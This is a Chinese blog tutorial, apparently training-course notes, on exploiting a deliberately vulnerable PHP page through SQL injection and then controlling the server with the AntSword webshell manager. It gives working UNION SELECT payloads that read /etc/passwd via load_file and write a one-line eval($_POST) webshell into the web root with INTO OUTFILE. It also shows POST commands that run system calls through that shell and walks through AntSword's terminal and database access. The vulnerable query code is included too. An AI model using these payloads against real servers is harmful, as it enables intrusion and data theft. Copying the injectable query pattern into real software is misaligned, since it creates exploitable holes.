木马蚁剑使用

于 2024-07-03 09:47:45 发布
阅读量335 收藏 7
点赞数 3
分类专栏: 网络安全 文章标签: android python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuge_long/article/details/140143872
版权

06-木马蚁剑

1 读写权限确认

数据库对文件的权限确认

show global variables like '%secure%';
查看mysql全局变量的配置,当输入以上命令后,结果
secure_file_priv = 空的时候,任意读写,存在严重的安全风险
secure_file_priv = 某个路径的时候,只能在规定的那个路径下读写
secure_file_priv = NULL 不能读写

2 读取文件内容

  1. 数据准备:

demo-sql.php

<?php
    include "dbUtil.php";
    function findById($id){
        //1.连接数据库 参数说明: ip 账号 密码 数据库
        $conn = mysqli_connect("192.172.10.24",'root','root','php_demo_db'); 
        //2.设置编码格式utf-8
        mysqli_query($conn,"set names utf8");
        //写sql
        $sql = "select * from userinfo where id=$id";
        //执行sql
        $res = mysqli_query($conn,$sql) or die("执行失败".mysqli_errno($conn));
        //拿到查询结果
        $arr = mysqli_fetch_row($res);
        print_r($arr);
        //打印sql   
        echo "<br>";  
        echo $sql;
    }
    $id = $_GET["id"];
    findById($id);
?>

2)sql注入

利用SQL语句读取系统文件,先读取常规文件(明确路径),如果能成功读取,则继续读取其他文件。如果明确知道路径,则直接尝试爆破路径下的文件,如果连路径都不知道,则爆破路径。

# 发送请求,读取文件,最后可读
http://192.168.190.133/demo/6-target/demo6-sql.php?id=1 union  select 1,2,3,(select load_file("/etc/passwd")) limit 1,1

结果:

image-20240527221915321

3 木马函数

  • eval():只能执行代码
  • assert():可以执行代码,也可以把字符串解析为代码执行

案例:

<?php
    eval(phpinfo()); // 加上双引号就不可以使用了
	eval(system(ifconfig));
	assert("phpinfo()"); // 更强大,可以执行字符串
    ?>

4 写入木马

百度搜索:大马 小马 一句话木马

前提:操作的系统目录要有其它用户的写权限,否者无法写入

数据库写法

select * from userinfo where id=1 union select 1,2,3,'aaa' into OUTFILE '/opt/lampp/htdocs/aa.txt'

查询

1 union select 1,2,3,(select load_file('/opt/lampp/htdocs/aa.txt')) limit 1,1

先看一个正确的,否者语法报错

image-20240527221945160

1)原理

# sql语句中有单引号,所以木马文件内容需要使用双引号
select * from userinfo where id=1 union  select 1,2,"<?php eval($_POST['code']) ?>",4 into outfile '/opt/lampp/htdocs/demo/6-target/mm.php'

2)开始写入木马

http://192.168.190.133/demo/6-target/demo6-sql.php?id=1 union  select 1,2, "<?php eval($_POST['code']) ?>",4 into outfile '/opt/lampp/htdocs/demo/6-target/mm.php'

3)通过浏览器访问木马文件

http://192.172.10.24/crm/php/mm.php
post正文:
code=phpinfo();
code=system(ifconfig);

木马植入成功结果:

image-20240528194341691

5 蚁剑getshell

5.1 部署

1)查看文件

image-20240528194636082

2)解压文件

3)初始化

image-20240528195055794

4)点击初始化

image-20240528195551437

5)生成桌面快捷方式

5.2 必要条件

  • 在web服务中,必须存在含有一句话木马的文件,通过http协议可以访问木马文件。
  • 必须使用post请求
<?php eval($_POST['code'])?>

5.3 使用

1)启动

image-20240528195723864

2)鼠标右键,选择添加数据

image-20240528195857251

3)点击添加

image-20240528195930082

4)双击打开数据管理,可以直接拿到操作系统中的很多数据

image-20240528200008401

5)返回上级目录

image-20240528200042163

6)右键,选择虚拟终端

image-20240528200117639

7)在shell中直接操作命令

image-20240528200150890

8)也可以右键,直接连接到数据库

image-20240528200424721

9)添加数据库连接

image-20240528200524456

蜗牛学苑_武汉
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
——中国利器
人若无名,便可专心练剑
02-06 936
适合学习渗透的同学
下载及使用
zr1213159840的博客
12-23 959
官方网址:https://github.com/AntSwordProject/AntSword-Loader 强烈推荐使用官方的地址下载 如果不能访问的话,百度云的地址如下: 链接:https://pan.baidu.com/s/1cNW4-hAkp5Weg8B4NW2DUg 提取码:jixf 下载完请自行验证md5 官方的教程如下: https://www.yuque.com/antswordproject/antsword/pgxa1h ...
WebShell --中国,黑客之
Kevin's Blog
05-07 7678
文章目录一、介绍二、下载安装三、使用3.1 管理Webshell 声明:请于合法授权环境下进行使用,请勿用于非法操作! 一、介绍   开源、跨平台网站管理工具(WebShell管理工具)   中文手册 Github地址: 二、下载安装 在V2版本后安装使用加载器方式进行安装 加载器:https://github.com/AntSwordProject/AntSword-Loader 源码:h...
软件的配置与应用
weixin_45711977的博客
10-27 7432
中国
中国下载、安装、使用教程
Sumarua的博客
07-26 1万+
文章目录中国下载、安装、使用教程一、中国下载二、中国安装三、中国使用1、添加一个shell2、插件3、关于编码器4、user-agent修改 中国下载、安装、使用教程 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 通俗的讲:中国是 一 款比菜刀还牛的shell控制端软件。 中国推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为
木蚂市场
09-06
木蚂已收录上万款适合国内用户使用的应用及游戏,囊括国内几大安卓资源站的数据及民间汉化组大量汉化作品,而且每天都有大 量创作者向木蚂提交收录; -完全免费下载,无需注册 所有应用及游戏完全免费,直接访问...
木蚂社区
10-02
CCleanerv2.21.940 木蚂社区专版
木蚂apk安装器
04-02
使用木蚂apk安装器的过程中,用户需要注意以下几点: 1. 来源:只从可信赖的网站或平台获取二维码,避免扫描不明来源的二维码,防止安装带有病毒或恶意代码的APK文件。 2. 权限:安装应用前,仔细阅读应用请求...
antsword蚂
05-04
antsword蚂
高仿木蚂安卓应用网站源码
10-05
【标题】"高仿木蚂安卓应用网站源码"是一个基于安卓应用市场——木蚂的模仿网站源代码,主要用于创建类似的应用下载平台。这个源码包含了一整套网站的前端和后端设计,使得开发者可以快速搭建一个具备自动更新、...
Web安全-AntSword(中国)Webshell管理工具使用
最新发布
Boom!脑洞大爆炸的博客
07-03 5539
Web安全-AntSword(中国)Webshell管理工具使用
Kali Linux安装 antSword详细过程
qq_49422880的博客
05-17 6503
Kali Linux安装 antSword详细的安装过程 详细的安装过程   因测试需要,需要安装蚂,自己折腾了一个小时左右,安装完成,针对网上的安装教程不够完整和不够清楚,于是自己写一篇关于的安装教程。   1.从github上下载源代码文件,我是在CTFtools中/antSword(为了把之后的装载文件也放在一起创建的文件)下载,会产生一个antSword的源代码文件。 git clone https://github.com/antoor/antSword.git 2.给这个文件夹权
连接一句话木马演示
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,等等类似工具,可以去看怎么
安装使用教程(附:上传漏洞示例)
li963820454的博客
04-06 2万+
简单安装使用教程(附带示例)
安装以及使用方法
qq_45951598的博客
09-14 2万+
一、如何安装 安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得 源码下载:https://github.com/AntSwordProject/antSword 加载器下载:https://github.com/AntSwordProject/AntSword-Loader 下载之后解压缩之后是这样的 点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe 点击初始化 点击初始化点击选
第48天-WAF 绕过-权限控制之代码混淆及行为造轮子
MCTSOG的博客
04-11 981
思维导图 Safedog 代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun 代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY 等后门免杀同理 一句话后门的原理: <?php@eval($_POST['password']) ?> @再php中含义为后面如果执行错误不会报错 eval()函数表示括号里的语句全做代码执行 $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
AntSword 中国的下载安装配置(附下载文件)
看那白熊
04-11 6583
好消息!你不用再发愁 Github 下载速度慢了,这里已经为你准备好文件了。 AntSword 中国下载安装配置说明,附带有加载器v4.0.3 和 源码 v2.1.8.1 文件。
中国(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
AntSword(持续更新)
末初的CSDN博客
05-17 6282
中国是一款开源的跨平台网站管理工具,核心代码模板均改自伟大的中国菜刀,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员 安装 的安装有两个部分,源码,加载器,加载器一定要下载,源码可以不下载,只需在加载器启动的时候创建一个新文件夹,然后把初始化目录指定到这个空文件夹中就可以了,加载器会自动下载源码并进行初始化 下载请认准官方的Github项目! 官方源码地址:https://github.com/AntSwordProject/antSword 官方.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值